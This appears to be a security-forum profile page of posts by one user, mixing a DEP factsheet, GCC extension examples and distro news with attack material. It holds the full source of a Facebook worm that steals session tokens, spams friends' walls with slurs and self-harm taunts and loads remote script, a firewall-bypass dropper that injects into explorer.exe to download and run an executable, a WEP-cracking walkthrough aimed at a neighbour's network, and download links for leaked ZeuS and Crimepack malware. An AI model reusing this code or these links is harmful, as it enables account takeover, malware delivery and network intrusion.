Everything posted by Nytro
-
Data Execution Prevention (DEP)
Systems and Network Analysis Center, Information Assurance Directorate

Computer attackers commonly use buffer overflow exploits to gain access to computer systems. Many of these malicious code exploits can be prevented with Data Execution Prevention (DEP), a security feature available in modern operating systems. DEP provides protection for all memory that is not specifically marked as executable code. This guide discusses how to configure and enable DEP.

Download: http://www.nsa.gov/ia/_files/factsheets/I733-TR-043R-2007.pdf
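An added example (mine, not from the NSA factsheet) of the check DEP makes, on Linux, where the same CPU feature is called NX. It writes a six-byte "return 42" stub into an anonymous page mapped read/write and tries to call it; the fault that DEP/NX raises is caught with sigsetjmp/siglongjmp so the program survives. It then flips the page to read/execute with mprotect and calls it again. The stub bytes, the signal-handler trick and the assumption that the host is x86-64 or AArch64 are mine.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Machine code for "return 42" (assumption: host is x86-64/i386 or AArch64). */
#if defined(__x86_64__) || defined(__i386__)
static const unsigned char stub[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };            /* mov eax,42 ; ret */
#elif defined(__aarch64__)
static const unsigned char stub[] = { 0x40, 0x05, 0x80, 0x52, 0xC0, 0x03, 0x5F, 0xD6 }; /* mov w0,#42 ; ret */
#else
static const unsigned char stub[] __attribute__((unused)) = { 0 };
#define STUB_UNSUPPORTED 1
#endif

static sigjmp_buf fault_env;

static void on_fault(int sig)
{
    (void)sig;
    siglongjmp(fault_env, 1);   /* unwind out of the faulting call */
}

/* Call the bytes at `page` as a function. Returns the stub's value (42), or -1
 * if the CPU raised SIGSEGV/SIGBUS, which is what NX does for a non-executable page. */
static int try_execute(void *page)
{
    int (*fn)(void);
    struct sigaction sa, old_segv, old_bus;
    int result;

    memcpy(&fn, &page, sizeof fn);          /* object -> function pointer */
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);

    if (sigsetjmp(fault_env, 1) == 0)
        result = fn();
    else
        result = -1;

    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return result;
}

/* Returns the result of calling the stub from a read/write page (-1 = blocked
 * by DEP/NX, 42 = it ran, -2 = setup error, -3 = unsupported CPU) and stores the
 * result of the same call after the page is made executable in *rx_result. */
int dep_probe(int *rx_result)
{
#ifdef STUB_UNSUPPORTED
    *rx_result = -3;
    return -3;
#else
    size_t ps = (size_t)sysconf(_SC_PAGESIZE);
    void *page = mmap(NULL, ps, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    int rw, rx;

    if (page == MAP_FAILED)
        return -2;
    memcpy(page, stub, sizeof stub);

    rw = try_execute(page);                 /* data page: DEP should refuse */

    if (mprotect(page, ps, PROT_READ | PROT_EXEC) != 0) {
        munmap(page, ps);
        return -2;
    }
    __builtin___clear_cache((char *)page, (char *)page + sizeof stub);
    rx = try_execute(page);                 /* marked executable: runs */

    munmap(page, ps);
    *rx_result = rx;
    return rw;
#endif
}

/* Wrappers so each half of the probe can be checked on its own. */
int probe_rw_result(void) { int rx = 0; return dep_probe(&rx); }
int probe_rx_result(void) { int rx = 0; dep_probe(&rx); return rx; }

int main(void)
{
    int rw = probe_rw_result(), rx = probe_rx_result();
    printf("call from RW page: %s\n", rw == -1 ? "blocked (DEP/NX active)" : rw == 42 ? "EXECUTED (no DEP)" : "probe error");
    printf("call from RX page: %s\n", rx == 42 ? "executed" : "failed");
    return (rw == -1 && rx == 42) ? 0 : 1;
}
```

On a machine with DEP/NX enforced the first call faults and the second returns 42; a classic stack or heap shellcode payload sits on exactly the kind of page the first call uses, which is why the mitigation pushes attackers toward return-oriented techniques.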
-
Yes, the idea is interesting. But the project itself would be quite complicated. The computers that will crack the md5s have to be selected elegantly (initially that would be enough), and all the possibilities have to be taken into account: what if a computer has to do 1,000,000 attempts and does only one? What if the connection drops and then comes back? It would be quite a bit of work.
-
Script that gives hackers access to user accounts floods Facebook

A widespread hack spread across Facebook early Thursday morning and shows no signs of abating as of yet. It comes in the form of a script that posts heavily profanity-laden wall posts continuously, instructing you that the only way to remove the posts is to click a 'Remove This App' link. Unfortunately the link is a hoax and allows the malicious script to access your Facebook account. Your account will then continue to spread the script in the form of similarly formatted wall posts on your friends' accounts. The message uses the phrase 'Vote for Nicole Santos', leading some to believe that it is a high school prank related to Prom season.

Here is a link (Pastebin) to the raw code of the script causing the problems on Facebook. If any of you commenters have any suggestions as to how this might have been injected in the first place please do let us know.

Script:

    // Text of the wall post that gets spammed to every friend.
    var message = "Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below.";
    // The "Remove This App" action link is a javascript: URL; clicking it loads a remote
    // script into the victim's Facebook page, which is how the worm runs in the next account.
    var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
    var myText = "Remove This App";
    // Anti-CSRF tokens and the user id are read straight out of the victim's own page,
    // so the POSTs below pass Facebook's checks.
    var post_form_id = document.getElementsByName('post_form_id')[0].value;
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    var friends = new Array();
    // Pull the victim's friend list through the typeahead endpoint (synchronous request).
    gf = new XMLHttpRequest();
    gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
    gf.send();
    if(gf.readyState!=4){
    }else{
      data = eval('(' + gf.responseText.substr(9) + ')');
      if(data.error){
      }else{
        friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
      }
    }
    // Post the message, with the malicious action link attached, to every friend's wall.
    for(var i=0; i<friends.length; i++){
      var httpwp = new XMLHttpRequest();
      var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
      var paramswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message;
      httpwp.open("POST", urlwp, true);
      httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      httpwp.setRequestHeader("Content-length", paramswp.length);
      httpwp.setRequestHeader("Connection", "keep-alive");
      httpwp.onreadystatechange = function(){
        if (httpwp.readyState == 4 && httpwp.status == 200){
        }
      }
      httpwp.send(paramswp);
    }
    alert("Failed to remove. Go fuck yourself with a cactus.");
    document.location = "profile.php?id=100000583908715";

Unsurprisingly many are trying to trace the source back to the 'Nicole Santos' that may have originated it, although it's unclear whether this person would be the originator or just a victim of the hack. As of now the only solution seems to be not to click on the link or any link requiring that you 'Verify your account to prevent spam', as this may be how the hack gains access to your Facebook wall in the first place. Simply block the friend sending it to you, as their account is now compromised. Once the problem has been fixed by Facebook you can re-enable them. We will continue to update you on the hack and its effects; check back with this post for more information.

Source: Script that gives hackers access to user accounts floods Facebook ! ~ THN : The Hackers News
-
Crimepack 3.1.3 Exploit kit Leaked, available for Download!

Part 1: Java Exploit

As stated above, I focus on a piece of malware that exploits a recent JRE vulnerability, CVE-2010-0840, to execute malicious files on a victim system. This malware comes inside a jar file, which contains the following two classes: Crimepack.class and KAVS.class.

Part 1.1: Crimepack.class

This class is the engine of the malware. It is obfuscated, but you can quickly strip off the obfuscation (my python beta tool is great...); once you get rid of the obfuscation you can see the following code: As always, we have an Applet that accesses the data parameter, generates a random name for the exe payload that will be dropped in the system temp directory and then executed. So at this point, as you can see, we have nothing new; the above is a common Java downloader... but let's scroll down: Above, we can see that the malware is creating a new instance of the KAVS class (description follows), in order to trigger the JRE vulnerability by using a call to the getValue() method (..snipped above..).

Part 1.2: KAVS.class

Here is the hand-crafted class. I say hand-crafted because such a class cannot be compiled by using a standard compiler, so you have to edit the compiled class by editing the bytecode:

Part 2: PDF-generator on demand

The kit contains a nice php script that drops custom PDFs on demand, which means that you can have several mutations of the same piece of malware by simply connecting to a malicious link.

Download: http://www.multiupload.com/3HGKHWMRS5
Source: Crimepack 3.1.3 Exploit kit Leaked, available for Download ! ~ THN : The Hackers News
Alternative: http://www.speedyshare.com/files/28425214/Crimepack_3.1.3.zip http://www.megaupload.com/?d=THZ8OW23
-
Assembly language for Penetration Testers

Below are useful resources for pentesters to learn assembly language as a starting point for exploit writing.

Assembly - SkullSecurity
Linux Assembly: Programming From the Ground Up (Index of /releases/pgubook)
Iczelion's Win32 Assembly Homepage
Art of Assembly Language Programming and HLA by Randall Hyde (the first 5 chapters are enough)
Intel Developer Manuals: Intel 64 and IA-32 Architectures Software Developer's Manuals

Assembly Language Primer for Hackers (videos):
Part 1: System Organization
Part 2: Virtual Memory Organization
Part 3: GDB Usage Primer
Part 4: Hello World
Part 5: Data Types
Part 6: Moving Data
Part 7: Working with Strings
Part 8: Unconditional Branching
Part 9: Conditional Branching
Part 10: Functions
Part 11: Functions Stack

Source: Assembly Language | Life of a Penetration Tester
-
To decrypt, or to crack hashes like md5?
-
I'll get there around 8.
-
They are trying to identify the author from the way he writes code. He appears to be a professional, of course... http://www.thehackernews.com/2011/05/fingerprinting-author-of-zeus-botnet.html
-
None. It presents some extensions of the GCC compiler that make life easier. At least read part of the article. For example, being able to define "1 ... 10" to represent any number from 1 to 10. That is not possible in Visual C++, for example, and is NOT part of the C standard!
-
Local File Inclusion to Remote Command Execution using SSH
Nytro replied to Nytro's topic in Tutoriale in engleza
nytro@rst:~$ ls -la /var/log/auth.log
-rw-r--r-- 1 syslog adm 1516 2011-05-12 17:20 /var/log/auth.log

I see it's "readable" by anyone...
-
GCC hacks in the Linux kernel
Discover GCC extensions for the C language
Skill Level: Intermediate
M. Tim Jones, Consultant Engineer, Emulex Corp
18 Nov 2008

The Linux® kernel uses several special capabilities of the GNU Compiler Collection (GCC) suite. These capabilities range from giving you shortcuts and simplifications to providing the compiler with hints for optimization. Discover some of these special GCC features and learn how to use them in the Linux kernel.

GCC and Linux are a great pair. Although they are independent pieces of software, Linux is totally dependent on GCC to enable it on new architectures. Linux further exploits features in GCC, called extensions, for greater functionality and optimization. This article explores many of these important extensions and shows you how they're used within the Linux kernel.

GCC in its current stable version (version 4.3.2) supports three versions of the C standard:
• The original International Organization for Standardization (ISO) standard of the C language (ISO C89 or C90)
• ISO C90 with amendment 1
• The current ISO C99 (the default standard that GCC uses and that this article assumes)

Note: This article assumes that you are using the ISO C99 standard. If you specify a standard older than the ISO C99 version, some of the extensions described in this article may be disabled. To specify the actual standard that GCC uses, you can use the -std option from the command line. Use the GCC manual to verify which extensions are supported in which versions of the standard (see Resources for a link).

Applicable versions
This article focuses on the use of GCC extensions in the 2.6.27.1 Linux kernel and version 4.3.2 of GCC. Each C extension refers to the file in the Linux kernel source where the example can be found.

The available C extensions can be classified in several ways. This article puts them in two broad categories:
• Functionality extensions bring new capabilities from GCC.
• Optimization extensions help you generate more efficient code.

Download: http://download.boulder.ibm.com/ibmdl/pub/software/dw/linux/l-gcc-hacks/l-gcc-hacks-pdf.pdf
Online: http://www.ibm.com/developerworks/linux/library/l-gcc-hacks/index.html
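An added example, not from the IBM article, showing a few of the kernel-style extensions in working code (gcc or clang in their default GNU mode): a case range (the "1 ... 10" form from the comment above), a statement expression plus __typeof__ giving a min() that evaluates each argument once, the container_of() idiom, __builtin_expect on an error path, and a packed struct. All names here are mine; the kernel spells __typeof__ as typeof, which is the same thing in GNU mode.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Optimization extension: branch hints, as include/linux/compiler.h spells them. */
#define likely(x)   __builtin_expect(!!(x), 1)
#define unlikely(x) __builtin_expect(!!(x), 0)

/* Functionality extension: statement expression + __typeof__.
 * Each argument is evaluated exactly once, like the kernel's min(). */
#define min_once(a, b) ({ __typeof__(a) _a = (a); __typeof__(b) _b = (b); _a < _b ? _a : _b; })

/* The plain-C macro for comparison: the winning argument is evaluated twice. */
#define min_naive(a, b) ((a) < (b) ? (a) : (b))

/* container_of(): recover the enclosing struct from a pointer to one of its members. */
#define container_of(ptr, type, member) ({                    \
    const __typeof__(((type *)0)->member) *_mptr = (ptr);     \
    (type *)((char *)_mptr - offsetof(type, member)); })

/* Case ranges: "low ... high" inside a switch. */
const char *classify_byte(unsigned char c)
{
    switch (c) {
    case '0' ... '9':  return "digit";
    case 'a' ... 'z':
    case 'A' ... 'Z':  return "alpha";
    case 0 ... 31:
    case 127:          return "control";
    default:           return "other";
    }
}

/* __attribute__((packed)): a wire-format header laid out with no padding. */
struct __attribute__((packed)) wire_hdr {
    uint8_t  type;
    uint32_t len;
    uint16_t flags;
};

int wire_hdr_size(void) { return (int)sizeof(struct wire_hdr); }   /* 7, not 12 */

/* Bounded copy whose failure path is marked unlikely(); returns bytes copied or -1. */
int copy_bounded(char *dst, size_t dst_size, const char *src, size_t n)
{
    if (unlikely(n >= dst_size))
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (int)n;
}

/* Side-effect counter that shows single vs. double evaluation of a macro argument. */
static int calls;
static int next_val(void) { return ++calls; }

int min_once_evaluations(void)  { calls = 0; (void)min_once(next_val(), 100);  return calls; }  /* 1 */
int min_naive_evaluations(void) { calls = 0; (void)min_naive(next_val(), 100); return calls; }  /* 2 */

/* container_of() in use: an intrusive list node embedded in a larger struct. */
struct node { struct node *next; };
struct session { int id; char user[16]; struct node link; };

int session_id_from_node(void)
{
    struct session s = { .id = 4242, .user = "nytro", .link = { NULL } };
    struct node *n = &s.link;                       /* all a list walker ever sees */
    return container_of(n, struct session, link)->id;
}

int main(void)
{
    char buf[8];
    printf("'7' is %s, 0x7f is %s\n", classify_byte('7'), classify_byte(127));
    printf("packed header: %d bytes\n", wire_hdr_size());
    printf("min_once evaluated its argument %d time(s), min_naive %d\n",
           min_once_evaluations(), min_naive_evaluations());
    printf("copy_bounded: %d / %d\n", copy_bounded(buf, sizeof buf, "abc", 3),
           copy_bounded(buf, sizeof buf, "toolongtoolong", 14));
    printf("session id via container_of: %d\n", session_id_from_node());
    return 0;
}
```

The min_naive/min_once pair is the reason the kernel bothers with statement expressions: with the naive macro, a side-effecting argument such as a read from hardware or a length check runs twice, which is both a correctness and a TOCTOU problem.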
-
Slackware 13.37

It's true! Slackware 13.37 has been released. Nearly a year in the making, you will appreciate the performance and stability that can only come with careful and rigorous testing. Slackware 13.37 uses the 2.6.37.6 Linux kernel (hence our new $SLACKWARE_VERSION.$KERNEL_VERSION naming system used for this release ;-), and also ships with 2.6.38.4 kernels for those who want to run the latest (and also includes configuration files for 2.6.35.12 and 2.6.39-rc4). The long-awaited Firefox 4.0 web browser is included, the X Window System has been upgraded (and includes the open source nouveau driver for nVidia cards). The venerable Slackware installer has been improved as well, with support for installing to btrfs (for those who would like to try a new copy-on-write filesystem), a one-package-per-line display mode option, and alienBOB's big surprise: an easy-to-set-up PXE install server that runs right off the DVD! More details may be found in the official announcement and in the release notes. For a complete list of included packages, see the package list.

Please consider supporting the Slackware project by picking up a copy of the Slackware 13.37 release from the Slackware Store. The discs are off to replication, but we're accepting pre-orders for the official 6 CD set and the DVD. The CD set is the 32-bit x86 release, while the DVD is a dual-sided disc with the 32-bit x86 release on one side and the 64-bit x86_64 release on the other. And, we still have T-shirts (coming soon, a limited edition 13.37 release commemorative black T-shirt with the classic Slackware logo on the front, and a "leet" LILO bootscreen on the back) and other Slackware stuff there, so have a look around.

Thanks to our subscribers and supporters for keeping Slackware going all these years. Thanks are again due to the Slackware crew, the developers of slackbuilds.org, the community on linuxquestions.org, Slackware IRC channels, and everyone else who helped out with this release.

Have fun, and enjoy the new stable release!
Pat and the Slackware crew

Oh, in case our web server that's rather short of RAM goes down, try this link: 1337 Error

Slackware 13.37 for ARM is also available. For details, see: start [slackware ARM]

Source: The Slackware Linux Project
-
Introduction to Network Security Toolkit (NST)

The Network Security Toolkit (NST) is an ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live distro are: Ntop, Wireshark, Nmap with the visualization tool Zenmap, and Kismet.

Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are Nmap with the visualization tool Zenmap, Ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management. You can read some of my articles about Nmap and Ntop by following the links; for Nmap there is also Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

On NST, Nagios and Argus are also available, two pieces of software that can be used for network monitoring: you can check the status of various services, like a web server, a POP/IMAP mail server, or other services that in general you can test directly with a network connection.

Another nice, and really "scenic", feature is that NST includes visualization of Ntop, Wireshark, traceroute and Kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST uses a custom tool, nstgeolocate: geolocate hosts obtained from an 'ntop' session, or geolocate IPv4 address conversations from a network packet capture file, on a Mercator World Map projection or global imagery. There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a "collector" backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages. A great guide on what is available on the live distro and how to use each tool is present on the official wiki.

Conclusions

This live CD is really filled with security tools and utilities, so it could be really useful for setting up, in a few minutes, a location from which you can do a security audit of a network or some hosts. The option to put it on a virtual machine is also interesting; on the wiki there is a good how-to on putting NST on VirtualBox. So, in a few words: try it and use it for your security audit, you'll be satisfied for sure.

Link: http://sourceforge.net/projects/nst/
Source (+video): » Linuxaria Introduction to Network Security Toolkit (NST)
-
Practical Android Attacks
Bas Alberts + Massimiliano Oldani, Immunity Inc.

Attack Surface
• Remote: gain access
  • Browser – WebKit
  • Phone – Telephony stack
• Local: elevate privileges
  • Kernel – Device drivers
  • Userland – Zygote, ADBd, udev, etc.

Download: https://www.immunityinc.com/infiltrate/presentations/Android_Attacks.odt.pdf
-
Local File Inclusion to Remote Command Execution using SSH May 9th, 2011 at 21:15 by lanmaster53 Log poisoning has been used for years to upgrade local file inclusion vulnerabilities to remote command execution. In most cases, web server logs are used to execute such an attack. Most admins have become wise to the technique and do a decent job of preventing this. However, an equal amount of attention is not always paid to authentication logs. I was recently attempting to exploit a LFI vulnerability on a pen test and was having no luck poisoning the web server logs. Previous scans of the target showed that an OpenSSH service was running. I took one last shot at the LFI vulnerability and below was the result. I was shocked to find that auth.log was world readable. By default, OpenSSH makes an entry (consisting of the user name and other data) to auth.log for every authentication attempt made to the ssh daemon. Knowing this, I did some quick testing and found that I could inject php code into auth.log from the user name field of an ssh client by attempting to authenticate. The command took some time to get working right as bash requires finesse for processing special characters, but after some troubleshooting, I came up with the following: One issue I encountered is that OpenSSH makes 3 entries containing the user name to auth.log for every authentication attempt. In the following example, only one authentication attempt was made, but, as you can see, it appears in the log 3 times. The injected command will run 3 times unless php execution is terminated after the 1st command. I did this above with the exit; command. The unfortunate side effect is that you have one chance to get this right. Otherwise, you have to wait until the log cycles before you can make another attempt. Here is what the final product looked like with the addition of a pre-format tag for aesthetics. 
Source: Local File Inclusion to Remote Command Execution using SSH « LaNMaSteR53.blog

Simple and efficient.
-
NoVirusThanks File Governor

Easily unlock locked files and folders. File Governor is an advanced program which allows files and folders within the system to be unlocked so that normal file I/O operations can be completed when normally they would not be able to be, due to operating system restrictions on files currently in use. Once a file or folder is unlocked you will be able to force-close the file's handle, rename, delete etc.

File Governor is compatible with the following 32-bit and 64-bit Microsoft Windows operating systems: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7.

Features
• Compatible with 32 & 64 bit OS
• Copy File to a User-Specified Directory
• Explorer Context Menu
• No Kernel Driver Needed
• Rename File to a User-Specified Filename
• Search for Locked Files
• Terminate Processes
• Unload DLL
• Unlock ALL Locked Files
• Unlock Single File
• Very user-friendly GUI

Download: http://downloads.novirusthanks.org/files/filegovernor_setup.exe
Portable: http://downloads.novirusthanks.org/files/portables/filegovernor_portable.zip
Source: NoVirusThanks File Governor - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks
-
Finally Source code of ZeuS Botnet Version 2.0.8.9 available for Download!

Download: http://krash.in/real2/zeus.rar http://www.multiupload.com/P8QUNF4YJN
Password: zeus
Source: Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! ~ THN : The Hackers News
Alternative: http://www.megaupload.com/?d=LTJR7DHO https://rapidshare.com/files/461898687/ZeuS_2.0.8.9.zip http://uploading.com/files/626ff4fc/ZeuS%2B2.0.8.9.zip/
-
Clickjacking Paper Paul Stone, a consultant at Context, has conducted research into Clickjacking and produced a white paper which was premiered at Black Hat 2010, in a talk of the same title – Next Generation Clickjacking. Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe. Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice. Download: http://www.contextis.com/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf
-
Two Zero Day Flaws Used To Bypass Google Chrome Security
May 10, 2011 | 02:02 PM
By Kelly Jackson Higgins, Dark Reading

French researchers say they hacked their way out of the browser's sandbox and bypassed DEP and ASLR.

Researchers at French firm VUPEN Security yesterday posted a video of a hack they say they executed using two zero-day vulnerabilities in Google's Chrome browser that successfully bypassed its sandbox and other security features. VUPEN, which withheld technical details of the bugs in its disclosure, had not disclosed the bugs or any details to Google as of this posting. The security firm provides details of vulnerabilities it discovers to its paying government customers.

"We did not publicly disclose any technical details of the vulnerabilities for security reasons. We did not send the technical details of the vulnerabilities to Google, and Google did not ask us to provide these details," says Chaouki Bekrar, CEO and head of research at VUPEN.

A Google spokesperson said in a statement that without any details on the hack, the company is unable to verify it. "We're unable to verify VUPEN's claims at this time as we have not received any details from them. Should any modifications become necessary, users will be automatically updated to the latest version of Chrome," the spokesperson said.

Chrome's sandbox feature, which runs an application in a restricted environment to protect the system, as well as the use of ASLR and DEP, had made the browser relatively impenetrable to hackers. Adobe also uses Chrome's sandboxing technology, but VUPEN's Bekrar says Adobe's software is not vulnerable to the new hack.

Bekrar says VUPEN employed two different bugs its researchers discovered: one that's exploited inside the sandbox, and one that's executed outside of it. "The first one results from a memory corruption leading to the execution of the first payload at low integrity level, inside the sandbox," he says. "A second payload is then used to exploit another vulnerability which allows the bypass of the sandbox and execution of the final payload with medium integrity level, outside the sandbox."

The exploit, demonstrated here using Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64), with the user being lured to visit a malware-rigged web page, also bypasses Microsoft's Address Space Layout Randomization (ASLR) security function and Data Execution Prevention (DEP) attack mitigation feature, and works on all Windows systems including Windows 7 Service Pack (SP) 1, Windows Vista SP2, and Windows XP SP3, according to Bekrar. Microsoft's ASLR protects Windows from an exploit attempting to call a system function: it places code in random areas of memory that make it more difficult for an attacker to run malware on a machine. DEP prevents an exploit from directly injecting and executing code from sections of memory used for data.

VUPEN Security early last year said it was able to bypass DEP on IE 8 and execute arbitrary code, and that it had sent its exploit code to Microsoft to examine. Other vendors have demonstrated DEP and ASLR bypass attacks: Core Security Technologies discovered a flaw in Microsoft's Virtual PC hypervisor that can be used by an attacker to cheat DEP and ASLR. And independent researcher Peter Vreugdenhil at CanSecWest 2010 waged a heap overflow attack on IE 8 and used a zero-day vulnerability he discovered in the browser to bypass Windows 7's built-in anti-exploit features, Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR).

VUPEN's Bekrar says it took the researchers "many weeks" to find a way to bypass Chrome's sandbox. "Chrome has probably the most secure sandbox in the market, and it took us many weeks to find a way to bypass it," he says. "We have been looking into its whole attack surface and features to find a hole allowing the escape from the sandbox."

Anup Ghosh, founder and chief scientist at Invincea, says it's no surprise that the sandbox was hacked. "We always knew from the very beginning, while an internal sandbox is a good idea, architecturally, you've still got a lot of residual attack space within the browser," Ghosh says. "It's always just been a question of when it would happen."

And the hack highlights just how the sandbox, albeit an extra layer of security, is still just another piece of software that has vulnerabilities of its own, experts say. "Like other security features such as ASLR, sandboxes are very important as they make exploitation much harder and mitigate threats, however a sandbox is not unbreakable as it is itself a piece of software which can be affected by vulnerabilities," Bekrar says.

Invincea's Ghosh says he expects the vulnerabilities to be exploited, initially by sophisticated attackers targeting specific organizations, and then eventually, by organized crime syndicates. "I have no doubt that this vulnerability will be exploited. The fact that they are not making it public makes it far more valuable," he says.

Meanwhile, there are no ways for Chrome users to protect themselves from these types of attacks.

Source: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229403161/two-zero-day-flaws-used-to-bypass-google-chrome-security.html
-
I forgot to mention the source; I've updated the first post.
-
How To Crack WEP using Backtrack w/Pictures
Author: Warlock

This tutorial is strictly educational; neither I nor leetcoders is responsible for whatever trouble you may get into by using this method. Tinypic killed a couple of my images; I'm sure you can still manage to do it.

Welcome to my tutorial. By the end of it, you should be able to have cracked your (or your nearby neighbor's) WEP-encrypted wifi.

What you need:
• Backtrack 3 or 4 (in this tutorial I used 3, since I had it lying around), which you can get from the Backtrack downloads page
• A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine)
• Patience

Assuming you've already downloaded Backtrack and burned it using your favorite burning software, restart your computer with the Backtrack disc, since it can be used as a live CD.

1. First of all, before you do anything, navigate to the wireless assistant: Start > Internet > Wireless Assistant. If you do not see any networks, then this will not work for you.
2. Open the konsole and type airmon-ng. It should show you your wireless card's info.
3. Type airmon-ng stop (your interface).
4. Type ifconfig (your interface) down, then macchanger --mac 00:11:22:33:44:55 (your interface). This spoofs your MAC address, so your victim cannot figure out who you are.
5. Type airodump-ng (your interface). This will open up a new konsole. Once you see the network you want to attack, press CTRL+C (this will stop your wireless card from searching for new networks).
6. Open a new konsole and type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface). It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets; the more packets, the better the chance of cracking it). Go watch a video on YouTube, or go on HF; any network activity will increase the amount of packets you pick up.
7. Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface).
8. Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface). Let it run for about 5 minutes while it collects the packets, then press CTRL+C.
9. Now type aircrack-ng -b (bssid) (filename-01.cap). You have found the WEP key, mine being 77838557744334834238286364 (without the colons).

And you're done!
~Warlock
Source: LeetCoders
-
FWB++
FWB++ example by r3l4x[] (FWB stands for Firewall Bypass)

    /* Coder:Anskya,r3l4x[] */
    // The linker settings are the trick: one writable+executable section and a fixed
    // image base, so the whole image can be copied byte-for-byte to the same address
    // inside explorer.exe without any relocation and run there. explorer.exe is normally
    // allowed out by personal firewalls, hence the bypass.
    #pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200")
    #pragma comment(linker,"/OPT:NOWIN98 /BASE:0x13140000 /INCREMENTAL:NO")
    #pragma comment(linker,"/ENTRY:Entrypoint /MERGE:.rdata=.text /MERGE:.data=.text")
    #pragma comment(lib, "urlmon.lib")
    #include <windows.h>
    #include <urlmon.h>   // URLDownloadToFile

    // Runs inside explorer.exe as a remote thread: download the payload and execute it.
    unsigned long inject(void *)
    {
        URLDownloadToFile(0, "htt://Www.Anskya.Net/Test.exe", "C:\\xx.exe", 0, 0);
        WinExec("C:\\xx.exe", SW_SHOW);
        ExitThread(0);
        return 0;
    }

    void Entrypoint()
    {
        DWORD Size;
        PBYTE module;
        HANDLE process;
        DWORD PID;
        LPVOID NewModule;

        // Our own image and its size, taken from the PE header.
        module = (PBYTE)GetModuleHandle(0);
        Size = ((PIMAGE_NT_HEADERS)(module + ((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;

        // Find explorer.exe through its tray window and open it with full access.
        GetWindowThreadProcessId(FindWindow("shell_traywnd", NULL), &PID);
        process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);

        // Claim our image base inside the target and copy the image there unchanged.
        VirtualFreeEx(process, module, 0, MEM_RELEASE);
        NewModule = VirtualAllocEx(process, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(process, NewModule, module, Size, NULL);

        // Start inject() at the same address it has in our own process.
        CreateRemoteThread(process, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL);
    }

Source: LeetCoders
-
Morphine Packer (C++ version)
Author: holyfather

This is a C/asm port of the original Delphi code.

Download: http://www.megaupload.com/?d=PU3FCSNN
Source: http://leetcoders.org/showthread.php?t=167
-
FF pass Decrypt
Firefox Password Decrypter by KriPpLer

//-----------------------------------------------------------------------
////////////////////////////////////////////////////////////
